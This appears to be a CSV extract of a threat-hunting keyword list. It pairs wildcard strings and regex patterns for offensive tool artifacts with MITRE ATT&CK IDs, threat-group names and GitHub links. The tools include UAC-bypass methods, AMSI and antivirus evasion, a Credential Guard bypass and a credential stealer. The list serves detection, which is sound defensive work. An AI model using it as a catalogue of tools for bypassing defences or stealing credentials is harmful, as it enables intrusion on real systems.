"*Bypass Success! Now impersonating the forged token*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#content","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","36445"
"*Bypass Success! Now impersonating the forged token* Loopback network auth should be seen as elevated now*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}\sLoopback\snetwork\sauth\sshould\sbe\sseen\sas\selevated\snow.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","36446"
"*Bypass UAC using .NET *",".{0,1000}Bypass\sUAC\susing\s\.NET\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36447"
"*Bypass UAC using cliconfg *",".{0,1000}Bypass\sUAC\susing\scliconfg\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36448"
"*Bypass UAC using cmstp *",".{0,1000}Bypass\sUAC\susing\scmstp\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36449"
"*Bypass UAC using compmgmtlauncher *",".{0,1000}Bypass\sUAC\susing\scompmgmtlauncher\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36450"
"*Bypass UAC using computerdefaults *",".{0,1000}Bypass\sUAC\susing\scomputerdefaults\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36451"
"*Bypass UAC using eventviewer *",".{0,1000}Bypass\sUAC\susing\seventviewer\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36452"
"*Bypass UAC using fodhelper *",".{0,1000}Bypass\sUAC\susing\sfodhelper\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36453"
"*Bypass UAC using mcx2prov *",".{0,1000}Bypass\sUAC\susing\smcx2prov\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36454"
"*Bypass UAC using migwiz *",".{0,1000}Bypass\sUAC\susing\smigwiz\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36455"
"*Bypass UAC using mock *",".{0,1000}Bypass\sUAC\susing\smock\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36456"
"*Bypass UAC using perfmon *",".{0,1000}Bypass\sUAC\susing\sperfmon\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36457"
"*Bypass UAC using runas, *",".{0,1000}Bypass\sUAC\susing\srunas,\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36458"
"*Bypass UAC using sdclt *",".{0,1000}Bypass\sUAC\susing\ssdclt\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36459"
"*Bypass UAC using silentcleanup *",".{0,1000}Bypass\sUAC\susing\ssilentcleanup\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36460"
"*Bypass UAC using slui *",".{0,1000}Bypass\sUAC\susing\sslui\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36461"
"*Bypass UAC using sysprep *",".{0,1000}Bypass\sUAC\susing\ssysprep\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36462"
"*Bypass UAC using token *",".{0,1000}Bypass\sUAC\susing\stoken\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36463"
"*Bypass UAC using wsreset *",".{0,1000}Bypass\sUAC\susing\swsreset\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36464"
"*bypass_cmdinject*",".{0,1000}bypass_cmdinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36465"
"*bypass_powershell_protections*",".{0,1000}bypass_powershell_protections.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36466"
"*Bypass-4MSI*",".{0,1000}Bypass\-4MSI.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","36467"
"*BypassAddUser.exe -*",".{0,1000}BypassAddUser\.exe\s\-.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","36468"
"*bypass-amsi*",".{0,1000}bypass\-amsi.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36469"
"*BypassAV.exe*",".{0,1000}BypassAV\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","N/A","10","10","908","125","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z","36470"
"*bypassBetterDiscord(*",".{0,1000}bypassBetterDiscord\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","36471"
"*bypass-classic.dll*",".{0,1000}bypass\-classic\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36472"
"*BypassCredGuard/zipball*",".{0,1000}BypassCredGuard\/zipball.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","36473"
"*BypassCredGuard-master*",".{0,1000}BypassCredGuard\-master.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","36474"
"*BYPASS-DINVOKE*.dll*",".{0,1000}BYPASS\-DINVOKE.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36475"
"*BYPASS-DINVOKE.dll*",".{0,1000}BYPASS\-DINVOKE\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36476"
"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*",".{0,1000}BYPASS\-DINVOKE_MANUAL_MAPPING\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36477"
"*bypass-pipe.c*",".{0,1000}bypass\-pipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36478"
"*bypass-powershell.ps1*",".{0,1000}bypass\-powershell\.ps1.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36479"
"*BypassUAC *.exe*",".{0,1000}BypassUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","36480"
"*bypassuac fodhelper*",".{0,1000}bypassuac\sfodhelper.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36481"
"*Bypass-UAC*",".{0,1000}Bypass\-UAC.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","36482"
"*bypassUAC*.boo*",".{0,1000}bypassUAC.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","36483"
"*bypassUAC*.py*",".{0,1000}bypassUAC.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","36484"
"*--bypass-uac*--logontype*",".{0,1000}\-\-bypass\-uac.{0,1000}\-\-logontype.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","36485"
"*bypassuac_comhijack.rb*",".{0,1000}bypassuac_comhijack\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36486"
"*bypassuac_compdefaults*",".{0,1000}bypassuac_compdefaults.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36487"
